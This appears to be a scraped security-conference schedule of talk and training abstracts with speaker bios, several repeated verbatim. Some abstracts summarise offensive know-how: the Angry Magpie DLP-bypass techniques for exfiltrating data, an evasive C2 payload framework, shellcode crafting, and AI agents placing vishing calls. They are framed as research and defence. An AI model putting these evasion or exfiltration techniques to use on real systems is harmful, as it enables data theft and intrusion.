Speakers:Joseph,Chelsea ButtonChelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.
- ics Calendar file
Nick and Kit team up to explain a story of fraud and scam as often reported in the news. A method of deceit with a unique financial angle is introduced, starting with a video to illustrate the problem. History of the actors involved in the analysis and security research reveals their complementary partnership, where they observe the scam to develop defense methods. A breakdown of the scam workflow follows its progress and funds are tracked as they move from the victim's possession. Finally, advice is given how to protect from becoming a victim of similar fraud.
Speakers:Nick "c7five" Percoco,KitbogaNick Percoco is the Chief Security Officer at Kraken, where he spearheads the frameworks and protocols that ensure a secure and seamless trading experience for clients. A recognized leader in the security and hacker community, Nick brings nearly 30 years of expertise in cybersecurity and technology, shaping the industry's approach to threat defense and risk mitigation. A dedicated contributor to the security community, he founded THOTCON, Chicago’s premier non-profit hacking conference, and has been a contributor to secure infrastructure and network design at DEFCON, the world’s largest hacking conference, since 2017. An accomplished speaker and researcher, Nick has presented groundbreaking work on cryptocurrency security, targeted malware, mobile security (iOS & Android), and IoT vulnerabilities at leading global forums, including Black Hat, RSA Conference, DEFCON, CfC St. Moritz, and SXSW.
SpeakerBio: Kitboga, KrakenWith more than 3M subscribers on YouTube and beyond, Kit pioneered scambaiting. “Everyday there are scammers taking advantage of people. I call them to waste their time, walk people through their "script" and lies, report info when I can, and otherwise make light of a dark situation.”
- ics Calendar file
Angry Magpie is an open-source toolkit that demonstrates critical bypasses in enterprise Data Loss Prevention (DLP) systems through browser-based techniques. Our research identifies a class of attacks — Data Splicing — that enable exfiltration of sensitive data by transforming it to evade detection patterns used by both proxy and endpoint DLP solutions. The toolkit showcases four primary techniques: data sharding, ciphering, transcoding, and channel smuggling, each demonstrating specific architectural limitations in current DLP implementations. Security teams can use Angry Magpie to test their defense mechanisms against these practical attacks, providing valuable insights for enhancing data protection strategies. With browsers now serving as the primary access point for enterprise data, understanding and addressing these vulnerabilities has become essential for maintaining effective data security posture. Special thanks to Pankaj Sharma from the SquareX research team for his contributions to Angry Magpie toolkit.
Speakers:Jeswin Mathai,Xian Xiang ChangJeswin leads the design and implementation of SquareX’s infrastructure. Previously, he was part of Pentester Academy (acquired by INE) where he was responsible for managing the whole lab platform that was used by thousands of customers. A seasoned speaker and researcher, Jeswin has showcased his work at prestigious international stages such as DEF CON US, DEF CON China, RootCon, Black Hat Arsenal, and Demo Labs at DEF CON. He has also imparted his knowledge globally, training in-class sessions at Black Hat US, Asia, HITB, RootCon, and OWASP NZ Day. Jeswin is also the creator of popular open-source projects such as AWSGoat, AzureGoat, and PAToolkit.
SpeakerBio: Xian Xiang ChangXian is a software engineer at SquareX, contributing to the industry's first browser detection and response solution. With deep technical expertise in browser security, he architected DetectiveSQ, a containerized system for dynamically analyzing Chrome extensions, earning recognition at Black Hat Asia Arsenal and exemplifying his ability to transform complex security challenges into practical defensive tools.
- ics Calendar file
“Anatomy of Telecom Malware” is a Telecom Village talk spanning 2G, 3G, 4G/LTE and cloud-native 5G. It dissects how attackers weaponise every layer of the stack—SS7/SIGTRAN, Diameter, GTP, SMPP and SBA APIs—while adding three critical lenses:
Attendees leave with a telecom-specific kill-chain map, protocol-aware detection tricks, and a 10-point hardening checklist to protect both legacy and future networks.
SpeakerBio: Akib Sayyed, Founder at Matrix ShellAkib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.
Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem. linkedin.com
Across consulting engagements, Akib is known for delivering:
Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.
- ics Calendar file
As we have seen with AIxCC, AI brings new tools to help with cybersecurity. But developing and operating AI/ML applications introduces new dimensions of risk due to their dynamic behavior, inherent complexity, and often opaque decision-making processes. The transition from Development and Operations (DevOps) to Development, Security, and Operations (DevSecOps) revealed the need for security practices integrated into the Software Development Life Cycle (SDLC) to address critical software security gaps. Machine Learning Operations (MLOps) will now need to go through the same transition into MLSecOps. MLSecOps places a strong emphasis on integrating security practices within the ML development life cycle. It establishes security as a shared responsibility among ML developers, security practitioners, and operations teams. Embracing this methodology enables early identification and mitigation of security risks, facilitating the development of secure and trustworthy ML models.
Speakers:Christopher Robinson,Sarah Evans,Eoin Wickens,Jeff Diecks
- ics Calendar file
Artificially Insecure turns secure-coding training into a high-energy tabletop challenge. In six rounds, players draw AI-generated code-snippet cards each round. Your mission is to locate the flaw and spell out the correct code to get an instant prize and be entered into a Lego giveaway.
SpeakerBio: Ken "cktricky" Johnson, Co-Founder and CTO at DryRun SecurityKen Johnson, has been hacking web applications professionally for 16 years. Ken is both a breaker and builder and is the CTO & Co-Founder of DryRun Security. Previously, Ken was a Director with GitHub's Product Security Engineering team and has held both technical and leadership roles both within the consulting world as well as a corporate defender. Previously, Ken has spoken about varying AppSec topics at RSA, You Sh0t the Sheriff, Insomnihack, CERN, DerbyCon, AppSec USA, AppSec DC, AppSec California, OWASP Global events, DevOpsDays DC, LASCON, RubyNation, and numerous other events. Ken's current passion project is the Absolute AppSec podcast with Seth Law and the practical secure code review course they offer thru DEF CON and other training venues.
Ken utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
- ics Calendar file
Join Shellphish captains Wil Gibbs and Lukas Dresel for a candid fireside chat on building ARTIPHISHELL, the fully-autonomous cyber reasoning system (CRS) that turned large-language models into indispensable teammates. They’ll trace their journey, from integrating LLM-powered reasoning into fuzzers for finding crashes to generating patches with LLM intuition. By the end, you’ll have a blueprint for fusing LLMs with traditional bug-finding techniques, an honest look at what still breaks, and fresh ideas for your own vulnerability-research workflow.
Speakers:Wil Gibbs,Lukas Dresel
- ics Calendar file
Electronic Frontier Foundation (EFF) is excited to be back at DEF CON. Our expert panelists will offer brief updates on EFF's work defending your digital rights, before opening the floor for attendees to ask their questions. This dynamic conversation centers challenges DEF CON attendees actually face, and is an opportunity to connect on common causes.
This year you’ll meet:
Alexis is an expert technologist and researcher on the security vulnerabilities which plague consumer electronics, and can speak to the disparate impact they have on communities.
SpeakerBio: Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFFCooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.
Cooper has many years of security research experience on tools of surveillance used by government agencies.
SpeakerBio: Lisa Femia, Staff Attorney at EFFfocuses on surveillance, privacy, free speech, and the impact of technology on civil rights and civil liberties
SpeakerBio: Thorin KlosowskiThorin is the Security and Privacy Activist at EFF, where he focuses on providing practical advice to protecting online security, including handling much of Surveillance Self-Defense.
- ics Calendar file
Unlock the secrets of shellcode by learning the fundamentals of low-level payload construction. In this session, you will learn how to craft Linux shellcode from scratch, starting with nothing but opcodes and a clear understanding of the syscall interface. Through live walkthroughs and byte-level insights, you will see how small instructions can yield powerful control. This is not magic; it's precision, intention, and raw skill. After the talk, you will have the chance to test your abilities with hands-on challenges that turn theory into practical exploitation.
SpeakerBio: f4_u57, Arizona State Universityf4_u57 is a senior undergraduate at Arizona State University and a security researcher at Research Innovations Incorporated (RII). His interests focuses on vulnerability research in embedded devices, with an emphasis on program analysis and system security. In his spare time, he is an active CTF player.
- ics Calendar file
Rapid advancements in AI raise important concerns about cybersecurity risks. While existing work shows AI still falls short of human expertise in cybersecurity, we aim to identify indicators of emerging capabilities and risks by studying the gap between AI and expert human performance. We compare top hackers—selected for their proven track record in security research and competitions—with AI systems attempting to exploit real and synthetic targets. This comparison helps us pinpoint where current frontier model evaluations fall short, what tacit knowledge is needed to exploit vulnerabilities effectively, and how these gaps might be addressed. By distilling the expertise, intuition, and problem-solving approaches that make human experts more effective than current foundation models, we highlight the unique skills that continue to differentiate human practitioners. Conversely, we seek to identify areas where AI’s latent capabilities may offer distinct advantages, helping experts better leverage these tools in their work. Our work aims to improve AI cybersecurity evaluations, address critical gaps in evidence-based policymaking, and better equip practitioners to adapt to shifts in the offense/defense landscape.
SpeakerBio: Justin W. Lin
- ics Calendar file
In today's interconnected world, software development relies heavily on third-party components---up to 80% of your code could come from external sources. This reliance creates a complex web of dependencies, making your software supply chain a prime target for cybercriminals. Securing it is no longer optional; it's essential.
This hands-on course takes a comprehensive approach to attacking and securing the software supply chain. In the first section, you'll assume the role of a sophisticated attacker, infiltrating an enterprise through its supply chain partners. You'll learn how to compromise developer laptops, code repositories, CI/CD pipelines, internal registries, and even production environments. Once you've seen how vulnerabilities can be exploited, we'll pivot to defense.
In the second section, we'll build and secure a GitHub organization, configure repositories, and implement best practices to mitigate risks. You'll learn how to secure IaC (Infrastructure as Code) assets, validate third-party code, and remediate vulnerabilities to ensure end-to-end protection.
Through practical exercises, you'll apply these strategies to safeguard your developer environments, CI/CD pipelines, and production systems. By the end of the course, you'll have the knowledge and tools to turn your software supply chain into a security strength rather than a liability.
SpeakerBio: Anant ShrivastavaAnant Shrivastava is a highly experienced information security professional with over 15 years of corporate experience. He is a frequent speaker and trainer at international conferences, and is the founder of Cyfinoid Research, a cyber security research firm. He leads open source projects such as Tamer Platform and CodeVigilant, and is actively involved in information security communities such as null, OWASP and various BSides Chapters and DefCon groups.
- ics Calendar file
In today's interconnected world, software development relies heavily on third-party components---up to 80% of your code could come from external sources. This reliance creates a complex web of dependencies, making your software supply chain a prime target for cybercriminals. Securing it is no longer optional; it's essential.
This hands-on course takes a comprehensive approach to attacking and securing the software supply chain. In the first section, you'll assume the role of a sophisticated attacker, infiltrating an enterprise through its supply chain partners. You'll learn how to compromise developer laptops, code repositories, CI/CD pipelines, internal registries, and even production environments. Once you've seen how vulnerabilities can be exploited, we'll pivot to defense.
In the second section, we'll build and secure a GitHub organization, configure repositories, and implement best practices to mitigate risks. You'll learn how to secure IaC (Infrastructure as Code) assets, validate third-party code, and remediate vulnerabilities to ensure end-to-end protection.
Through practical exercises, you'll apply these strategies to safeguard your developer environments, CI/CD pipelines, and production systems. By the end of the course, you'll have the knowledge and tools to turn your software supply chain into a security strength rather than a liability.
SpeakerBio: Anant ShrivastavaAnant Shrivastava is a highly experienced information security professional with over 15 years of corporate experience. He is a frequent speaker and trainer at international conferences, and is the founder of Cyfinoid Research, a cyber security research firm. He leads open source projects such as Tamer Platform and CodeVigilant, and is actively involved in information security communities such as null, OWASP and various BSides Chapters and DefCon groups.
- ics Calendar file
Attack Flow Detector is an open-source tool that helps defenders uncover coordinated cyber attacks buried in noisy alert data. Instead of relying on LLMs or black-box AI, it uses explainable machine learning to map alerts, logs, and telemetry to MITRE ATT&CK techniques, cluster them into contextualized attack steps, and chain them into complete killchains. Built for blue teamers and SOC analysts, it's lightweight, interpretable, and easy to deploy in real environments. This demo will show how the tool processes real-world-style data, generates actionable tickets, and supports root cause analysis. If you're drowning in false positives or lone incidents, this is for you.
Speakers:Ezz Tahoun,Kevin ShiEzz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.
SpeakerBio: Kevin ShiKevin is a data scientist specializing in cybersecurity and machine learning, currently working at the Canadian Institute for Cybersecurity at the University of New Brunswick. He holds a Master’s degree in Data Science from the University of Windsor, where he focused on applying advanced analytics and machine learning techniques to complex cybersecurity problems. His expertise includes developing and optimizing AI-driven methods for threat detection, anomaly identification, and security event analysis. His research contributions emphasize practical implementations of data science in cybersecurity operations, bridging theoretical approaches with real-world applications.
- ics Calendar file
The Attacking and Securing CI/CD course is an on-demand and self-paced program designed to equip participants with the knowledge and skills to identify vulnerabilities and implement security measures within Continuous Integration and Continuous Deployment (CI/CD) pipelines. This course combines theoretical knowledge with practical, hands-on labs that simulate real-world scenarios in a CI/CD environment.
SpeakerBio: Raunak Parmar, Senior Cloud Security Engineer at White Knight LabsRaunak Parmar works as a senior cloud security engineer at White Knight Labs. His areas of interest include web penetration testing, Azure/AWS security, source code review, scripting, and development. He enjoys researching new attack methodologies and creating open-source tools that can be used during cloud red team activities. He has worked extensively on Azure and AWS and is the author of Vajra, an offensive cloud security tool. He has spoken at multiple respected security conferences like Black Hat, Defcon, Nullcon, RootCon, and also at local meetups.
- ics Calendar file
The Attacking and Securing CI/CD course is an on-demand and self-paced program designed to equip participants with the knowledge and skills to identify vulnerabilities and implement security measures within Continuous Integration and Continuous Deployment (CI/CD) pipelines. This course combines theoretical knowledge with practical, hands-on labs that simulate real-world scenarios in a CI/CD environment.
SpeakerBio: Raunak Parmar, Senior Cloud Security Engineer at White Knight LabsRaunak Parmar works as a senior cloud security engineer at White Knight Labs. His areas of interest include web penetration testing, Azure/AWS security, source code review, scripting, and development. He enjoys researching new attack methodologies and creating open-source tools that can be used during cloud red team activities. He has worked extensively on Azure and AWS and is the author of Vajra, an offensive cloud security tool. He has spoken at multiple respected security conferences like Black Hat, Defcon, Nullcon, RootCon, and also at local meetups.
- ics Calendar file
TheTimeMachine is an offensive OSINT and bug bounty recon suite that revives forgotten endpoints from the past using the Wayback Machine. Designed for red teamers, CTF players, and bounty hunters, it automates historical data mining, subdomain extraction, parameter harvesting, and endpoint fuzzing for vulnerabilities like XSS, open redirect, LFI, and SQLi. The suite also integrates a powerful JWT analysis engine to extract, decode, and highlight juicy fields from tokens hidden in archived URLs. TheTimeMachine also hunts leaked archives and even verifies whether archived snapshots are still live. With colorful terminal output, modular CLI tools, and support for custom wordlists, this tool resurrects the buried past to exploit the forgotten future. Dead links don’t die here—they just get reconned harder.
Speakers:Arjun "T3R4_KAAL" Chaudhary,Anmol "Fr13nd0x7f" K. SachanArjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.
SpeakerBio: Anmol "Fr13nd0x7f" K. SachanAnmol is a security consultant at NetSPI with expertise in web, API, AI/ML, and network penetration testing as well as attack surface management and offensive security automation. He has reported to over 50 organizations via VDPs, discovered multiple CVEs, and co-founded cybersecurity communities like CIA Conference and OWASP Chandigarh. He is also an active open-source contributor — his tools like WayBackLister, ThreatTracer, The Time Machine, and more have collectively earned over 600 GitHub stars. He is passionate about red teaming and building tools that enhance real-world security assessments.
- ics Calendar file
Bias doesn’t just exist in algorithms—it shows up across the entire cyber stack. This panel brings together leaders from government, defense, and industry to explore how systemic bias can creep into everything from security controls and threat modeling to hiring pipelines and data governance. We’ll unpack how biases—human and machine—undermine trust, widen attack surfaces, and perpetuate inequality in cybersecurity workflows. Whether you’re building tech, shaping policy, or defending networks, this session challenges you to audit more than just code.
Speakers:Jessica Hoffman,Kaleeque PierceDynamic and influential cybersecurity leader serving as Deputy CISO for the City of Philadelphia, host of CISO Stories, and adjunct professor at Harrisburg University and Penn State. With nearly two decades of experience, she specializes in cybersecurity audit & compliance, NIST frameworks, and safeguarding sensitive data such as PII, PHI, and FTI. Highly engaged in the cyber community—as a speaker, mentor, and advocate—she champions proactive security culture, diversity, and hands-on learning at conferences and in the classroom. Outside of work, Jessica channels her creativity into photography and networking, earning recognition as a thought leader and role model in cybersecurity.
SpeakerBio: Kaleeque PierceAccomplished business and technology executive with a 19‑year track record, currently serving as Business Product Manager for Enterprise Cloud Platforms at Bank of America. A CPA candidate and MBA graduate, Kaleeque blends deep financial acumen with cloud and service delivery expertise honed at institutions like Citrix, CAI, and Deloitte. Recognized for his leadership and community involvement, he actively volunteers with Charlotte's Alliance of Black Accountants, promoting thought leadership and innovation in both technology and finance.
- ics Calendar file
I love code autoformatters, but I jump between a lot of projects, and figuring out the rules for each project is tedious. Nix and Treefmt make this a whole lot better, but don't provide editor integrations.
I'll talk about how I built a format-on-save Neovim plugin that Does the Right Thing. If you aren't a Neovim user, I hope to inspire you to build a similar integration for your preferred editor.
SpeakerBio: Jeremy FleischmanProgrammer. Speedcuber. Formerly at Arista Networks, the World Cube Association, and Honor Technology. Currently on sabbatical, spending my time leveling up my Nix skills and contributing to the community.
- ics Calendar file
Hands-on Demonstration – approximately 40 minutes to learn about the protocol and system, the research behind the tool, and the hands-on activity.
Participants will learn about the standard satellite communication protocol developed by the Consultative Committee for Space Data Systems (CCSDS). The CCSDS protocols prioritize reliability and efficiency, however those guidelines are often ignored or implemented improperly. We will demonstrate how to detect and protect against vulnerabilities in CCSDS protocols. We want to inform those in the space sector about potential problems in CCSDS protocols and their impacts, along with a method for automating security assessments of these systems.
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
Behind every blinking LED and clever CTF is a mountain of caffeine, chaos, and carefully disguised panic. In this panel, veteran badge creators share their hard-earned lessons from years in the trenches of Badgelife - what worked, what absolutely didn’t, and what miraculously came together 12 hours before con opened. From catastrophic PCB errors and customs nightmares to soldering in hotel bathtubs, and shipping hacks that would make a logistics manager cry - we’ll break down the real behind-the-scenes stories that never make it to the badge booth. Whether you’re a first-time builder or a seasoned badge nerd, this is your survival guide (and therapy session) in one.
Speakers:Abhinav Pandagale,MakeItHackin,Bradán LaneAbhinav's artistry comes from the times he used to sneakily paint drawings made by his sister. His hacking career began as a toddler, disassembling his toys but never put them back together. His entrepreneurial roots come from selling snacks at a school fair and making a loss of . Having learned how not to make money, he launched Hackerware.io - a boutique badgelife lab with in-house manufacturing - which has grown over the past nine years into a global presence across 19 countries. He’s often spotted at conferences around the world - hosting hardware villages or pulling off the kind of random shenanigans that earned him the Sin CON Person of the Year 2025 award.
SpeakerBio: MakeItHackin, Badge MakerMakeItHackin graduated with a physics degree and served in the Army before diving into electronics in 2016, the same year as his first DEF CON! He joined the badge-making scene at DEF CON 29, fueling a passion for reverse-engineering. With a love for tearing apart tech, he tinkers as a hobbyist, and has previously spoken at Physical Security Village, HOPE Conference, and Hackaday Supercon.
SpeakerBio: Bradán Lane, Bradán Lane StudiosBradán graduated third grade with a degree in crayon. This, combined with his unwavering belief in “how difficult could it be”, has made him eminently qualified to wash dishes. His background in UX Designer & User Research and as a purveyor of personas demonstrates his profound talent for making stuff up with confidence. Bradán pre-dates the internet and ARPANET.
- ics Calendar file
BadVR Data Exploration through VR visualization. See RF signals, cellular signals and step into the data with a hands-on VR experience
Speakers:Suzanne Borders,Jad MeouchySuzanne Borders, CEO + Founder, BadVR, Inc. Suzanne studied psychology at University of Missouri, Kansas City and previously worked as Lead UX/Product Designer for over 9 years at companies such as Remine (raised $48M) and CREXi (raised $54M) where she specialized in designing intuitive, high-performant data analytic interfaces. In 2019, Suzanne founded BadVR and was awarded a “Rising Stars” innovation award from IEEE. To date, she’s raised over $4M in non-dilutive funding for BadVR, via grants from the National Science Foundation, NOAA, Magic Leap, Qualcomm, and more. Suzanne has grown the company from 2 to 25 people and was awarded 4 patents for innovations she created while leading the BadVR team. Over the past 5 years, Suzanne emerged as a thought-leader in the immersive data visualization and analytics space. She has been a keynote speaker at over 25 national and international conferences. In her spare time, Suzanne travels for inspiration (81 countries and counting) and is proud to be a published author and former punk. Suzanne thrives at the intersection of product design, immersive technology, and data; she’s a believer in the artistry of technology and the technicality of art and remains passionately dedicated to democratizing access to data through universally accessible products.
SpeakerBio: Jad Meouchy, CTO + Co-Founder at BadVRJad Meouchy, CTO + Co-Founder, BadVR, Inc. Jad, originally from northern Virginia, holds dual B.S. degrees in Computer Engineering and Psychology from Virginia Tech, and is a graduate of the Thomas Jefferson High School for Science and Technology. While in college, he engineered and built the data visualization components of an emergency response simulation that went on to receive 2M in public grant funding. Over his 15-year career, Jad has founded five startups and successfully exited three. His professional expertise is in software architecture and development, specifically big data analytics and visualization, and virtual and augmented reality development. Based in Los Angeles since 2010, Jad promotes the community by organizing developer meetups and events, and volunteering time for STEM initiatives.
- ics Calendar file
Watch teams deploy AI-powered agents in a soundproof booth to place live vishing calls and hit preset objectives, pushing the limits of automation, hacking, and human psychology.
- ics Calendar file
The Beaconator C2 framework provides multiple highly evasive payloads, created to provide red teams with code execution, versatility, and ease of use. It is intended to be a Swiss Army knife for evasive C2, with a unified listener and basic tools to manage an engagement. The goal is to empower red/purple teams to emulate emerging adversary tactics that are evasive, prove them out, and then open tickets with various AV/EDR vendors to improve detectability for these blind spots that are now exploited in the wild.
Speakers:Mike "CroodSolutions" Manrod,Ezra "Shammahwoods" WoodsMike serves as the CISO for Grand Canyon Education and adjunct faculty for Grand Canyon University, teaching malware analysis. Mike also co-founded the Threat Intelligence Support Unit (TISU), a community for threat and adversary research. He is also a co-author/contributor for the joint book project, Understanding New Security Threats published by Routledge in 2019, along with numerous articles. When not working, he spends time playing video games and doing random projects with his kids.
SpeakerBio: Ezra "Shammahwoods" WoodsEzra is an avid security researcher currently working as an information security engineer with Grand Canyon Education.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth BiddlecomeSam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at AmazonKaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional ServicesIrvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and InstructorElizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.
- ics Calendar file
